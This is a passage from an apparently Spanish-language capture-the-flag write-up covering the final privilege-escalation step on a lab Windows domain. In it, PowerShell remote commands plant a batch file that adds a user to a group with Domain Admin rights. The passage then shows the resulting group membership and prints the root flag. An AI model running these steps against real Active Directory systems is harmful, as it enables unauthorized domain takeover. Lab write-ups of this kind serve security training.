Group name Site_Admin
Comment Only in the event of emergencies is this to be populated. This has access to Domain Admin group
Members
-------------------------------------------------------------------------------
The command completed successfully.
PS C:\Utils> Invoke-Command atsserver -ConfigurationName dc_manage -Credential $cred -ScriptBlock { Set-Content -Path "C:\Program Files\keepmeon\a.bat" -Value "net group site_admin awallace /add /domain" }
PS C:\Utils> Invoke-Command atsserver -ConfigurationName dc_manage -Credential $cred -ScriptBlock { type "C:\Program Files\keepmeon\a.bat" }
net group site_admin awallace /add /domain
Después de algunos minutos, veremos que pertenecemos al grupo Domain Admins, y por tanto, podremos leer la flag root.txt:
PS C:\Utils> Invoke-Command atsserver -ConfigurationName dc_manage -Credential $cred -ScriptBlock { whoami /groups }
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
============================================ ================ ============================================== ===============================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Certificate Service DCOM Access Alias S-1-5-32-574 Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators Alias S-1-5-32-544 Mandatory group, Enabled by default, Enabled group, Group owner
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
ACUTE\Domain Admins Group S-1-5-21-1786406921-1914792807-2072761762-512 Mandatory group, Enabled by default, Enabled group
ACUTE\Managers Group S-1-5-21-1786406921-1914792807-2072761762-1111 Mandatory group, Enabled by default, Enabled group
ACUTE\Site_Admin Group S-1-5-21-1786406921-1914792807-2072761762-2102 Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1 Mandatory group, Enabled by default, Enabled group
ACUTE\Denied RODC Password Replication Group Alias S-1-5-21-1786406921-1914792807-2072761762-572 Mandatory group, Enabled by default, Enabled group, Local Group
Mandatory Label\High Mandatory Level Label S-1-16-12288
PS C:\Utils> Invoke-Command atsserver -ConfigurationName dc_manage -Credential $cred -ScriptBlock { type C:\Users\Administrator\Desktop\root.txt }
4964aad06240586b6e55bf408011c24e